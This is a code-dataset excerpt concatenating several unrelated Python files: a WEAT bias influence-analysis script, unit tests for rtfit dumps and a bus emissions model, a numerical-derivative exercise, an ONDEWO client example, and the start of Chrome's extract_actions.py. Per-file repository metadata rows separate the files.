    model.eval()
    mando_final = model.predict(mando_ind)
    test_index = mando_ind.item()
    # If in sparse, r = 1. else r = 120 ??
    # If in sparse, recursion_depth = 1, else recursion_depth = 10000 ??
    influence, harmful, helpful = calc_influence_single(model=model,
                                                        train_dataset=dataset,
                                                        z_test=mando_final, t_test=mando_init,
                                                        recursion_depth=recursion_depth,
                                                        r=r,
                                                        test_indices=[test_index],
                                                        scifi=True)
    return influence, harmful, helpful, dataset, all_keys
def explain_bias(test='math',
                 model_name='DENSE_biased_window-10_negatives-10_60_checkpoint.pth.tar',
                 data_fn='biased_data_numericalized_dataset.pkl',
                 vocab_fn='biased_data_stoi.pkl',
                 window_size=10,
                 recursion_depth=5000,
                 r=10,
                 other_embeds=None):
    """Compute training-sample influences on a WEAT bias measurement.

    Arguments:
        test: str, which WEAT word-set to use: 'math', 'science', 'career'
            or 'race'
        model_name: str, checkpoint filename of the model to analyse
        data_fn: str, numericalized dataset filename inside DATA_DIR
        vocab_fn: str, pickled string-to-index vocabulary filename
        window_size: int, skip-gram context window of the dataset
        recursion_depth: int, iterations per s_test round
        r: int, averaging rounds for the s_test estimate
        other_embeds: optional str, path to prior-work embeddings that replace
            the model's own embedding weights before the analysis
    Returns:
        (influence, harmful, helpful, dataset, all_keys)
    Raises:
        ValueError: if `test` is not one of the four known WEAT names.
    """
    dataset = InfluenceMedDataset(data_dir=DATA_DIR,
                                  filename=data_fn,
                                  window_size=window_size)
    # Close the vocabulary file deterministically (was left open before).
    with open(os.path.join(DATA_DIR, vocab_fn), 'rb') as vocab_file:
        stoi = pickle.load(vocab_file)
    all_keys = list(stoi.keys())
    # A/B: attribute word sets, X/Y: target word sets of the WEAT test.
    if test == 'math':
        A = ['math', 'algebra', 'geometry', 'calculus', 'equations', 'computation', 'numbers', 'addition']
        B = ['poetry', 'art', 'dance', 'literature', 'novel', 'symphony', 'drama', 'sculpture']
        X = ['male', 'man', 'boy', 'brother', 'he', 'him', 'his', 'son']
        Y = ['female', 'woman', 'girl', 'sister', 'she', 'her', 'hers', 'daughter']
    elif test == 'science':
        A = ['science', 'technology', 'physics', 'chemistry', 'einstein', 'nasa', 'experiment', 'astronomy']
        B = ['poetry', 'art', 'shakespeare', 'dance', 'literature', 'novel', 'symphony', 'drama']
        X = ['brother', 'father', 'uncle', 'grandfather', 'son', 'he', 'his', 'him']
        Y = ['sister', 'mother', 'aunt', 'grandmother', 'daughter', 'she', 'her', 'hers']
    elif test == 'career':
        X = ['john', 'paul', 'mike', 'kevin', 'steve', 'greg', 'jeff', 'bill']
        Y = ['amy', 'joan', 'lisa', 'sarah', 'diana', 'kate', 'ann', 'donna']
        A = ['executive', 'management', 'professional', 'corporation', 'salary', 'office', 'business', 'career']
        B = ['home', 'parents', 'children', 'family', 'cousins', 'marriage', 'wedding', 'relatives']
    elif test == 'race':
        A = ['freedom', 'health', 'love', 'peace', 'cheer', 'friend', 'heaven', 'loyal', 'pleasure', 'diamond',
             'gentle', 'honest', 'lucky', 'diploma', 'gift', 'honor', 'miracle', 'sunrise', 'family',
             'happy', 'laughter', 'vacation']
        B = ['crash', 'murder', 'sickness', 'accident', 'death', 'grief', 'poison', 'stink',
             'assault', 'disaster', 'hatred', 'tragedy', 'bomb', 'divorce', 'jail', 'poverty', 'ugly',
             'cancer', 'evil', 'kill', 'rotten', 'vomit']
        X = ['josh', 'alan', 'ryan', 'andrew', 'jack', 'greg', 'amanda', 'katie', 'nancy', 'ellen']
        Y = ['theo', 'jerome', 'leroy', 'lamar', 'lionel', 'malik', 'tyrone', 'ebony', 'jasmine', 'tia', ]
    else:
        # Previously an unknown name fell through and crashed later with a
        # NameError on A/B/X/Y; fail fast with a clear message instead.
        raise ValueError(f"Unknown WEAT test {test!r}; "
                         "expected 'math', 'science', 'career' or 'race'.")
    x_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in X]
    y_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in Y]
    a_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in A]
    b_embed = [torch.tensor([all_keys.index(x)], dtype=torch.long).to(device='cpu') for x in B]
    test_indices = np.unique(x_embed+y_embed+a_embed+b_embed).tolist()
    model = load_skipgram(model_name, device)
    x_embed = [x.to(device=DEVICE) for x in x_embed]
    y_embed = [x.to(device=DEVICE) for x in y_embed]
    a_embed = [x.to(device=DEVICE) for x in a_embed]
    b_embed = [x.to(device=DEVICE) for x in b_embed]
    z_test = [x_embed, y_embed]
    t_test = [a_embed, b_embed]
    if other_embeds is not None:
        model = load_prior_work_embeddings(model, other_embeds)
    influence, harmful, helpful = calc_influence_single(model=model,
                                                        train_dataset=dataset,
                                                        z_test=z_test, t_test=t_test,
                                                        recursion_depth=recursion_depth,
                                                        r=r,
                                                        test_indices=test_indices,
                                                        scifi=False)
    return influence, harmful, helpful, dataset, all_keys
def write_out_results(influences, harmfuls, helpfuls, dataset, keys, file_prefix=''):
    """Write influence results and the ordered training samples to DATA_DIR.

    Produces three files (all prefixed by `file_prefix`):
      * test_results.txt    — raw influences / harmful / helpful arrays
      * harmful_ordered.txt — one decoded training sample per line, most
                              harmful first (appended if the file exists)
      * helpful_ordered.txt — same, most helpful first

    Arguments:
        influences: array of influence values
        harmfuls: array of [sample_index, influence] rows, harmful first
        helpfuls: array of [sample_index, influence] rows, helpful first
        dataset: dataset providing get_raw_sample(index) -> token ids
        keys: list mapping token id -> vocabulary string
        file_prefix: str prepended to every output filename
    """
    f1 = os.path.join(DATA_DIR, file_prefix+"test_results.txt")
    with open(f1, 'w') as f:
        f.write(f"Influences: {influences}")
        f.write('\n')
        f.write(f"Harmful: {harmfuls}")
        f.write('\n')
        f.write(f"Helpful: {helpfuls}")
        f.write('\n')
    _write_ordered_samples(os.path.join(DATA_DIR, file_prefix+'harmful_ordered.txt'),
                           harmfuls, dataset, keys)
    _write_ordered_samples(os.path.join(DATA_DIR, file_prefix+'helpful_ordered.txt'),
                           helpfuls, dataset, keys)


def _write_ordered_samples(path, ordered_influences, dataset, keys):
    """Append one line of space-separated decoded tokens per influence entry.

    Arguments:
        path: output filename (opened in append mode, like the original)
        ordered_influences: iterable of [sample_index, influence] rows
        dataset: dataset providing get_raw_sample(index)
        keys: list mapping token id -> vocabulary string
    """
    # Open once in append mode: behaviourally identical to the original
    # per-line re-open, but without the per-iteration open/close overhead.
    with open(path, 'a', encoding='utf-8') as f:
        for entry in ordered_influences:
            token_ids = np.array(dataset.get_raw_sample(int(entry[0])))
            words = ''
            for token_id in token_ids:
                try:
                    words += keys[token_id] + ' '
                except (IndexError, TypeError):
                    # Skip ids that fall outside the vocabulary list
                    # (the original used a bare `except:` here).
                    continue
            f.write(str(words))
            f.write('\n')
if __name__ == "__main__":
    # TEST THIS STUFF
    from cross_loss_influence.models.skip_gram_word2vec import SkipGramModel
    from cross_loss_influence.data.scripts.my_pytorch_dataset import InfluenceMedDataset
    from cross_loss_influence.config import DATA_DIR, MODEL_SAVE_DIR, PROJECT_NAME
    import pickle
    import os
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("-b", "--base", help="biased or neutral", type=str, default='biased')
    parser.add_argument("-t", "--test", help="test? ['career', 'science', 'math', 'race']", type=str, default='career')
    parser.add_argument("-m", "--model_name", help="Model name to investigate", type=str, required=True)
    parser.add_argument("-w", "--word", help="Word for the scifi tests", type=str)
    args = parser.parse_args()
    original = args.base
    test_name = args.test
    model_name = args.model_name
    word = args.word
    # start_time = time.time()
    w_s = 3
    device = DEVICE
    # Estimation hyper-parameters: `rec` is the number of averaging rounds (r)
    # and `r_depth` the recursion depth passed to the influence routines.
    rec = 10  # 1
    r_depth = 5000  # 1
    if test_name == 'scifi':
        rec = 1
        r_depth = 5000
        if not word:
            # Explicit usage error instead of an assert: asserts are stripped
            # under `python -O`, and the old `len(word)` raised a confusing
            # TypeError when -w was omitted (word is None by default).
            parser.error("-w or --word must be passed in for the scifi test")
        i_out, harm_out, help_out, dset, keyset = explain_embed_pos(word=word,
                                                                    model_name=model_name,
                                                                    data_fn='all_scripts_numericalized_dataset.pkl',
                                                                    vocab_fn='all_scripts_stoi.pkl',
                                                                    window_size=w_s,
                                                                    r=rec,
                                                                    recursion_depth=r_depth)
        write_out_results(i_out, harm_out, help_out, dset, keyset,
                          file_prefix=f'{test_name}_{original}_influence_scifi')
    else:
        prior_work_fn = None
        if 'bolukbasi' in model_name:
            # Bolukbasi-style debiased embeddings: remember the embedding file
            # and strip the wrapper from the checkpoint name.
            prior_work_fn = model_name
            model_name = model_name.split('original_')[-1].split('_debiased')[0]
            # prior_work_fn = os.path.join(DATA_DIR, f'bolukbasi_original_{model_name}_debiased.txt')
        print(f"Beginning influence estimation on {original} embeddings with {test_name} WEAT")
        i_out, harm_out, help_out, dset, keyset = explain_bias(test=test_name,
                                                               model_name=model_name,
                                                               data_fn=f'{original}_data_numericalized_dataset.pkl',
                                                               vocab_fn='biased_data_stoi.pkl',
                                                               window_size=10,
                                                               recursion_depth=r_depth,
                                                               r=rec,
                                                               other_embeds=prior_work_fn)
        file_prefix = ''
        if 'bolukbasi' in model_name:
            file_prefix += 'bolukbasi_'
        file_prefix += f'{test_name}_{original}_{model_name}_influence_'
        write_out_results(i_out, harm_out, help_out, dset, keyset,
                          file_prefix=file_prefix)
| 46.26742 | 124 | 0.591379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,921 | 0.363115 |
637fe0e94faeee830062160453c7c20c39eeaafb | 6,189 | py | Python | tests/test_rtfit_dumps.py | ndraeger/rt1 | 8cf30a3b3604b78b1422388e479b28c921d01c09 | [
"Apache-2.0"
] | null | null | null | tests/test_rtfit_dumps.py | ndraeger/rt1 | 8cf30a3b3604b78b1422388e479b28c921d01c09 | [
"Apache-2.0"
] | null | null | null | tests/test_rtfit_dumps.py | ndraeger/rt1 | 8cf30a3b3604b78b1422388e479b28c921d01c09 | [
"Apache-2.0"
] | null | null | null | """
Test the fits-module by loading a dumped rtfits result and performing
all actions again
"""
import unittest
import numpy as np
import cloudpickle
import matplotlib.pyplot as plt
import copy
import os
class TestDUMPS(unittest.TestCase):
    """Regression tests that load pickled rtfits results and re-run them.

    Each test deserializes a pre-computed fit dump (shipped next to this
    file), re-runs the fit, and exercises the plotting / dumping machinery.
    """

    def setUp(self):
        # Paths of the two pre-computed fit dumps (dB and linear sig0 data).
        self.sig0_dB_path = os.path.dirname(__file__) + os.sep + "sig0_dB.dump"
        self.sig0_linear_path = os.path.dirname(__file__) + os.sep + "sig0_linear.dump"

    def load_data(self, path):
        """Deserialize and return a dumped fit object from `path`."""
        with open(path, 'rb') as file:
            fit = cloudpickle.load(file)
        return fit

    # self.assertTrue(
    #     err < errdict[key],
    #     msg='derived error' + str(err) + 'too high for ' + str(key))

    def test_rtplots(self):
        """Call every public method of fit.plot and its interactive widgets."""
        for path, msg in zip([self.sig0_dB_path, self.sig0_linear_path],
                             ['dB', 'linear']):
            print(f'testing plotfunctions for {msg} fit')
            fit = self.load_data(path)
            # call performfit to re-initialize _fnevals functions
            # and evaluate intermediate results
            # (they might have been removed if symengine has been used)
            fit.lsq_kwargs['verbose'] = 0
            fit.performfit(intermediate_results=True,
                           print_progress=True)
            # get list of available plot-methods
            method_list = [func for func in dir(fit.plot) if
                           callable(getattr(fit.plot, func)) and not func.startswith("__")]
            for function_name in method_list:
                print(f'... {function_name}')
                if function_name == 'printsig0analysis':
                    # check 'dataset' index slider
                    f, s1, s2 = fit.plot.__getattribute__(function_name)(
                        range2=2, range1=1, use_index='dataset')
                    # check update functions
                    s1.set_val(1)
                    s2.set_val(1)
                    plt.close(f)
                    # check 'groups' index slider
                    f, s1, s2 = fit.plot.__getattribute__(function_name)(
                        range2=2, range1=1, use_index='groups')
                    # check update functions
                    s1.set_val(1)
                    s2.set_val(1)
                    plt.close(f)
                elif function_name == 'analyzemodel':
                    f, sliders, txt_but = fit.plot.__getattribute__(
                        function_name)()
                    # check update functions
                    for key, s in sliders.items():
                        s.set_val((s.valmax - s.valmin)/2.)
                    for key, b in txt_but.items():
                        if key == 'buttons':
                            # the initial status is ALL OFF
                            stat = b.get_status()
                            for i in range(len(stat)):
                                b.set_active(i)
                            # now all should be ON
                            self.assertTrue(np.all(b.get_status()))
                            for i in range(len(stat)):
                                b.set_active(i)
                            # now all should be OFF again
                            self.assertTrue(~np.all(b.get_status()))
                        else:
                            # set the boundaries of the parameters
                            if 'min' in key:
                                b.set_val(0.02)
                            if 'max' in key:
                                b.set_val(0.99)
                    plt.close(f)
                elif function_name == 'intermediate_residuals':
                    # check default (e.g. pandas datetime-offset)
                    f = fit.plot.__getattribute__(function_name)(fmt='%d.%b %Y')
                    plt.close(f)
                    # check grouping with respect to incidence angles and
                    # convert the labels to degrees
                    f = fit.plot.__getattribute__(function_name)(
                        grp=('inc', 10),
                        label_formatter=lambda x,y:round(np.rad2deg(x),2))
                    plt.close(f)
                    # check grouping with respect to datetimes
                    f = fit.plot.__getattribute__(function_name)(grp='groups')
                    plt.close(f)
                    # check grouping with respect to the dataset index
                    f = fit.plot.__getattribute__(function_name)(
                        grp='dataset', plottype='2D', fmt='%Y %b %d (%H:%M)')
                    plt.close(f)
                else:
                    # all remaining plot methods must work with defaults
                    f = fit.plot.__getattribute__(function_name)()
                    plt.close(f)

    def test_performfit(self):
        """Re-run performfit and check it reproduces the dumped results."""
        for path, msg in zip([self.sig0_dB_path, self.sig0_linear_path],
                             ['dB', 'linear']):
            print(f'testing plotfunctions for {msg} fit')
            fit = self.load_data(path)
            # keep the originally fitted values for later comparison
            old_results = fit.res_dict
            # print model definition
            fit.model_definition
            print('testing performfit')
            fit.lsq_kwargs['verbose'] = 0
            fit.performfit(intermediate_results=True,
                           print_progress=True)
            # call _cache_info() to make coveralls happy
            fit._cache_info()
            fit.R._cache_info()
            # try to dump the file again (without fit-details)
            fit.dump(os.path.join(os.path.dirname(__file__), 'testdump1.dump'),
                     mini=True)
            # try to dump the file again (with fit-details)
            fit.dump(os.path.join(os.path.dirname(__file__), 'testdump2.dump'),
                     mini=False)
            # the re-fitted values must agree with the dumped ones
            for key, val in old_results.items():
                self.assertTrue(np.allclose(fit.res_dict[key],
                                old_results[key], atol=1e-4, rtol=1e-4),
                                msg=f'fitted values for {msg} fit of {key} ' +
                                f'differ by {np.subtract(fit.res_dict[key], old_results[key]).mean()}')
if __name__ == "__main__":
unittest.main() | 40.45098 | 108 | 0.487801 | 5,932 | 0.958475 | 0 | 0 | 0 | 0 | 0 | 0 | 1,545 | 0.249636 |
637feac03a2aafd17dc15fa959b7227bdea86a08 | 3,234 | py | Python | tests/test_bus_model.py | romainsacchi/carculator_bus | 5db105db4223b2f58509fa19b1fccafa16313458 | [
"BSD-3-Clause"
] | 1 | 2021-05-31T08:43:06.000Z | 2021-05-31T08:43:06.000Z | tests/test_bus_model.py | romainsacchi/carculator_bus | 5db105db4223b2f58509fa19b1fccafa16313458 | [
"BSD-3-Clause"
] | 2 | 2021-05-27T09:21:52.000Z | 2021-06-09T21:35:26.000Z | tests/test_bus_model.py | romainsacchi/carculator_bus | 5db105db4223b2f58509fa19b1fccafa16313458 | [
"BSD-3-Clause"
] | 1 | 2021-05-31T08:43:12.000Z | 2021-05-31T08:43:12.000Z | import numpy as np
from carculator_bus import *
# Build a static set of bus input parameters and derive the model once at
# import time; the test functions below all read from this shared `tm`.
tip = BusInputParameters()
tip.static()
# fill_xarray_from_input_parameters returns a 2-tuple; only the parameter
# array (second element) is needed here.
_, array = fill_xarray_from_input_parameters(tip)
tm = BusModel(array, country="CH")
tm.set_all()
def test_presence_PHEVe():
    """The PHEV-e powertrain must have been dropped from the model array."""
    powertrains = tm.array.powertrain.values.tolist()
    assert "PHEV-e" not in powertrains
def test_ttw_energy_against_VECTO():
    """The TtW energy consumption of a 13m city diesel bus must lie within
    the interval given by VECTO (empty vs. fully loaded vehicle)."""
    # VECTO reference bounds: (empty, fully loaded).
    # NOTE(review): units assumed consistent with the model's
    # 'TtW energy' parameter — confirm.
    vecto_empty, vecto_full = (8300, 13700)
    assert (
        vecto_empty
        <= tm.array.sel(
            powertrain="ICEV-d",
            year=2020,
            size="13m-city",
            parameter="TtW energy",
            value=0,
        )
        <= vecto_full
    )
# NOTE: leftover comment from a planned check — no assertion below verifies
# that the fuel cell stack mass lies within a given interval.
def test_auxiliary_power_demand():
    """Combustion buses must draw less auxiliary power than opportunity-charging electric buses."""
    diesel_aux = tm.array.sel(
        powertrain="ICEV-d", year=2020, parameter="auxiliary power demand", value=0
    )
    electric_aux = tm.array.sel(
        powertrain="BEV-opp", year=2020, parameter="auxiliary power demand", value=0
    )
    assert np.all(diesel_aux < electric_aux)
def test_battery_replacement():
    """The number of battery lifetime replacements can never be negative."""
    replacements = tm["battery lifetime replacements"]
    assert np.all(replacements >= 0)
def test_cargo_mass():
    """Mass-balance sanity checks of the bus model."""
    # Curb mass can never exceed the total driving mass (curb + load).
    assert np.all(tm["curb mass"] <= tm["driving mass"])
    # Cargo mass must equal the available payload * load factor
    # assert np.allclose((tm["available payload"] * tm["capacity utilization"]), tm["total cargo mass"])
def test_electric_utility_factor():
    """The electric utility factor must lie within [0, 1] everywhere.

    BUG FIX: the previous assertion was `0 <= np.all(...) <= 1`, which chains
    the comparison on a single boolean and is therefore always true; the
    bounds must be checked element-wise instead.
    """
    utility_factor = tm["electric utility factor"]
    assert np.all((utility_factor >= 0) & (utility_factor <= 1))
def test_fuel_blends():
    """Fuel blend definitions must be internally consistent."""
    # Primary and secondary shares of each fuel blend must sum to 1
    # across all six blend-share entries.
    for fuel in tm.fuel_blend:
        np.testing.assert_array_equal(
            np.array(tm.fuel_blend[fuel]["primary"]["share"])
            + np.array(tm.fuel_blend[fuel]["secondary"]["share"]),
            [1, 1, 1, 1, 1, 1],
        )
    # A fuel cannot be specified both as primary and as secondary fuel.
    for fuel in tm.fuel_blend:
        assert (
            tm.fuel_blend[fuel]["primary"]["type"]
            != tm.fuel_blend[fuel]["secondary"]["type"]
        )
def test_battery_mass():
    """Battery mass bookkeeping must be internally consistent."""
    # Total energy-battery mass must equal cell mass plus balance-of-plant mass.
    # NOTE(review): `tm(...)` is used as a context manager here; it appears to
    # yield a view restricted to the given powertrain — confirm in BusModel.
    with tm("BEV-opp") as cpm:
        assert np.allclose(
            cpm["energy battery mass"],
            cpm["battery cell mass"] + cpm["battery BoP mass"],
        )
    # Cell mass must equal stored capacity divided by cell energy density.
    with tm("BEV-depot") as cpm:
        assert np.allclose(
            cpm["battery cell mass"],
            cpm["electric energy stored"] / cpm["battery cell energy density"],
        )
def test_noise_emissions():
    """A city bus must emit noise only in urban compartments (no rural/suburban noise)."""
    # Build a fresh model so this test is independent of the shared `tm`.
    bus_model = BusModel(array, country="CH")
    bus_model.set_all()
    non_urban = ["rural", "suburban"]
    # Collect every noise parameter attributed to a non-urban compartment.
    noise_params = [
        name
        for name in bus_model.array.parameter.values
        if "noise" in name and any(comp in name for comp in non_urban)
    ]
    assert bus_model.array.sel(size="13m-city", parameter=noise_params).sum() == 0
| 28.368421 | 104 | 0.624613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,268 | 0.392084 |
6380b2f2030ee551fa4870964c341464ca8bdcf7 | 2,828 | py | Python | Ej-Lab8-MoisesSanjurjo-UO270824/ejercicio2-MoisesSanjurjo-UO270824.py | moiSS00/CN | 1e30b43ee2167d15fbc8c472ff9637c2b920c3d4 | [
"MIT"
] | null | null | null | Ej-Lab8-MoisesSanjurjo-UO270824/ejercicio2-MoisesSanjurjo-UO270824.py | moiSS00/CN | 1e30b43ee2167d15fbc8c472ff9637c2b920c3d4 | [
"MIT"
] | null | null | null | Ej-Lab8-MoisesSanjurjo-UO270824/ejercicio2-MoisesSanjurjo-UO270824.py | moiSS00/CN | 1e30b43ee2167d15fbc8c472ff9637c2b920c3d4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Ejercicio 2: Aproximación numérica de orden 1 y de orden 2 de la
derivada de la función f(x) = 1/x.
"""
import numpy as np
import matplotlib.pyplot as plt
# Función f(x)= 1/x y su derivada f'
f = lambda x:1/x # función f
df = lambda x:(-1)/x**2 # derivada exacta f'
#---------------------------------------------------------------
# Derivación numérica de orden 1
#---------------------------------------------------------------
h = 0.01 # paso
a = 0.2 # extremo inferior del intervalo
b = 1.2 # extremo superior del intervalo
x = np.arange(a,b+h,h) # vector con 1º coordenada a, última coordenanda b y diferencia entre coordenadas h
# Diferencias progresiva y regresivas
df_p = np.diff(f(x))/h # vector que contiene los valores de las diferencias progresivas
df_r = df_p # vector que contiene los valores de las diferencias regresivas
# Para los puntos interiores con aproximación centrada
df_c = (df_p[1:] + df_r[0:-1])/2
# Extremo izquierdo con aproximación progresiva (orden 1)
df_a = df_p[0]
# Extremo derecho con aproximación regresiva (orden 1)
df_b = df_r[-1]
# Construimos un vector que contenga todos los valores de la der. num de orden 1
# El vector será de la forma [aprox. en extremo izdo, aprox. en puntos interiores, aprox. en extremo dcho.]
df_a = np.array([df_a]) # transformamos df_a en un vector
df_b = np.array([df_b]) # transformamos df_b en un vector
Aprox_1 = np.concatenate((df_a,df_c,df_b)) # vector que contiene los valores de la der. num. de orden 1
Error_1 = np.linalg.norm(df(x)-Aprox_1)/np.linalg.norm(df(x)) # error de orden 1
print("Error con derivacion de orden 1 = ",Error_1) # escribimos el error en pantalla
#---------------------------------------------------------------
# Derivación numérica de orden 2
#---------------------------------------------------------------
# Para los puntos interiores la aproximación centrada es la misma que en el caso anterior
# Extremo izquierdo: aproximación progresiva (orden 2)
df_a2 = (-3*f(x[0])+4*f(x[0]+h)-f(x[0]+2*h))/(2*h)
# Extremo derecho: aproximación regresiva (orden 2)
df_b2 = (f(x[-1]-2*h)-4*f(x[-1]-h)+3*f(x[-1]))/(2*h)
# Construimos un vector que contenga todos los valores de la der. num de orden 2
# El vector será de la forma [aprox. en extremo izdo, aprox. en puntos interiores, aprox. en extremo dcho.]
df_a2 = np.array([df_a2]) # transformamos df_a2 en un vector
df_b2 = np.array([df_b2]) # transformamos df_b2 en un vector
Aprox_2 = np.concatenate((df_a2,df_c,df_b2)) # vector que contiene los valores de la der. num. de orden 2
Error_2 = np.linalg.norm(df(x)-Aprox_2)/np.linalg.norm(df(x)) # error de orden 2
print("Error con derivacion de orden 2 = ",Error_2) # escribimos el error en pantalla
| 43.507692 | 110 | 0.631542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,017 | 0.708465 |
6381338cf437e2f23817a23137a8ed44d42f412e | 1,982 | py | Python | examples/multi_client_example.py | ondewo/ondewo-csi-client-python | 5ba00402d7d28374f49eb485dd6ed661ebc446f2 | [
"Apache-2.0"
] | null | null | null | examples/multi_client_example.py | ondewo/ondewo-csi-client-python | 5ba00402d7d28374f49eb485dd6ed661ebc446f2 | [
"Apache-2.0"
] | 2 | 2021-05-25T09:18:32.000Z | 2021-07-02T10:14:29.000Z | examples/multi_client_example.py | ondewo/ondewo-csi-client-python | 5ba00402d7d28374f49eb485dd6ed661ebc446f2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
#
# Copyright 2021 ONDEWO GmbH
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ondewo.nlu.agent_pb2 as agent
import ondewo.s2t.speech_to_text_pb2 as s2t
import ondewo.t2s.text_to_speech_pb2 as t2s
from ondewo.nlu.client import Client as NluClient
from ondewo.nlu.client_config import ClientConfig as NluClientConfig
from ondewo.s2t.client.client import Client as S2tClient
from ondewo.t2s.client.client import Client as T2sClient
from ondewo.csi.client.client import Client as CsiClient
from ondewo.csi.client.client_config import ClientConfig
# Load the CSI client configuration from disk.
with open("csi.json") as fi:
    config = ClientConfig.from_json(fi.read())
# The NLU client needs its own config type, parsed from the same file.
with open("csi.json") as fi:
    nlu_config = NluClientConfig.from_json(fi.read())
# One client per ONDEWO service.
csi_client = CsiClient(config=config)
s2t_client = S2tClient(config=config)
t2s_client = T2sClient(config=config)
nlu_client = NluClient(config=nlu_config)
# Query the available speech-to-text and text-to-speech pipelines.
s2t_pipelines = s2t_client.services.speech_to_text.list_s2t_pipelines(request=s2t.ListS2tPipelinesRequest())
t2s_pipelines = t2s_client.services.text_to_speech.list_t2s_pipelines(request=t2s.ListT2sPipelinesRequest())
print(f"Speech to text pipelines: {[pipeline.id for pipeline in s2t_pipelines.pipeline_configs]}")
print(f"Text to speech pipelines: {[pipeline.id for pipeline in t2s_pipelines.pipelines]}")
# List the NLU agents.  NOTE: the comprehension variable `agent` shadows the
# imported `ondewo.nlu.agent_pb2` module inside the print expression below.
agents = nlu_client.services.agents.list_agents(request=agent.ListAgentsRequest())
print(f"Nlu agents: {[agent.agent.parent for agent in agents.agents_with_owners]}")
63819767d87fb2523fcafd5031ccca5b56c6122d | 4,149 | py | Python | chrome/tools/extract_actions.py | zachlatta/chromium | c4625eefca763df86471d798ee5a4a054b4716ae | [
"BSD-3-Clause"
] | 1 | 2021-09-24T22:49:10.000Z | 2021-09-24T22:49:10.000Z | chrome/tools/extract_actions.py | changbai1980/chromium | c4625eefca763df86471d798ee5a4a054b4716ae | [
"BSD-3-Clause"
] | null | null | null | chrome/tools/extract_actions.py | changbai1980/chromium | c4625eefca763df86471d798ee5a4a054b4716ae | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright 2007 Google Inc. All rights reserved.
"""Extract UserMetrics "actions" strings from the Chrome source.
This program generates the list of known actions we expect to see in the
user behavior logs. It walks the Chrome source, looking for calls to
UserMetrics functions, extracting actions and warning on improper calls,
as well as generating the lists of possible actions in situations where
there are many possible actions.
See also:
chrome/browser/user_metrics.h
http://wiki.corp.google.com/twiki/bin/view/Main/ChromeUserExperienceMetrics
Run it from the chrome/browser directory like:
extract_actions.py > actions_list
"""
__author__ = 'evanm (Evan Martin)'
import os
import re
import sys
from google import path_utils
# Files that are known to use UserMetrics::RecordComputedAction(), which means
# they require special handling code in this script.
# To add a new file, add it to this list and add the appropriate logic to
# generate the known actions to AddComputedActions() below.
# Entries are compared against os.path.basename() results in GrepForActions.
KNOWN_COMPUTED_USERS = [
  'back_forward_menu_model.cc',
  'options_page_view.cc',
  'render_view_host.cc',  # called using webkit identifiers
  'user_metrics.cc',  # method definition
  'new_tab_ui.cc',  # most visited clicks 1-9
]
def AddComputedActions(actions):
  """Add computed actions to the actions list.

  These mirror the dynamically-built action names recorded via
  UserMetrics::RecordComputedAction() in the files listed in
  KNOWN_COMPUTED_USERS.

  Arguments:
    actions: set of actions to add to.
  """
  # Actions for back_forward_menu_model.cc.
  # Loop variable renamed from 'dir' to 'prefix': 'dir' shadows the builtin.
  for prefix in ['BackMenu_', 'ForwardMenu_']:
    actions.add(prefix + 'ShowFullHistory')
    actions.add(prefix + 'Popup')
    for i in range(1, 20):
      actions.add(prefix + 'HistoryClick' + str(i))
      actions.add(prefix + 'ChapterClick' + str(i))
  # Actions for new_tab_ui.cc (most-visited thumbnail clicks 1-9).
  for i in range(1, 10):
    actions.add('MostVisited%d' % i)
def AddWebKitEditorActions(actions):
  """Add editor actions scraped from webkit/glue/editor_client_impl.cc.

  Arguments:
    actions: set of actions to add to.
  """
  # Matches table rows of the form: { <ident>, <word>, "ActionName" },
  action_re = re.compile(r'''\{ [\w']+, +\w+, +"(.*)" +\},''')
  editor_file = os.path.join(path_utils.ScriptDir(), '..', '..', 'webkit',
                             'glue', 'editor_client_impl.cc')
  # Fix: use a context manager so the file handle is closed deterministically
  # (previously the handle from bare open() was never closed).
  with open(editor_file) as f:
    for line in f:
      match = action_re.search(line)
      if match:
        actions.add(match.group(1))
def GrepForActions(path, actions):
  """Grep a source file for calls to UserMetrics functions.

  Adds every literal action name found to `actions`, and prints a warning
  to stderr for suspicious RecordAction / RecordComputedAction usage.

  Arguments:
    path: path to the file
    actions: set of actions to add to
  """
  # ':?:?' tolerates zero, one, or two colons between 'UserMetrics' and
  # 'RecordAction'; the L"..." prefix matches wide-string literals.
  action_re = re.compile(r'[> ]UserMetrics:?:?RecordAction\(L"(.*)"')
  other_action_re = re.compile(r'[> ]UserMetrics:?:?RecordAction\(')
  computed_action_re = re.compile(r'UserMetrics::RecordComputedAction')
  # NOTE(review): the handle from open(path) is never closed explicitly;
  # this Python 2-era script relies on GC to reclaim it.
  for line in open(path):
    match = action_re.search(line)
    if match:  # Plain call to RecordAction
      actions.add(match.group(1))
    elif other_action_re.search(line):
      # Warn if this file shouldn't be mentioning RecordAction.
      # (Only user_metrics.cc may reference RecordAction without a literal.)
      if os.path.basename(path) != 'user_metrics.cc':
        print >>sys.stderr, 'WARNING: %s has funny RecordAction' % path
    elif computed_action_re.search(line):
      # Warn if this file shouldn't be calling RecordComputedAction.
      if os.path.basename(path) not in KNOWN_COMPUTED_USERS:
        print >>sys.stderr, 'WARNING: %s has RecordComputedAction' % path
def WalkDirectory(root_path, actions):
  """Recursively grep every .cc file under root_path for UserMetrics actions.

  Arguments:
    root_path: directory to walk.
    actions: set of actions to add to (filled in by GrepForActions).
  """
  for path, dirs, files in os.walk(root_path):
    if '.svn' in dirs:
      # Prune Subversion metadata directories from the walk in-place.
      dirs.remove('.svn')
    # Loop variable renamed from 'file' to avoid shadowing the builtin.
    for fname in files:
      ext = os.path.splitext(fname)[1]
      if ext == '.cc':
        GrepForActions(os.path.join(path, fname), actions)
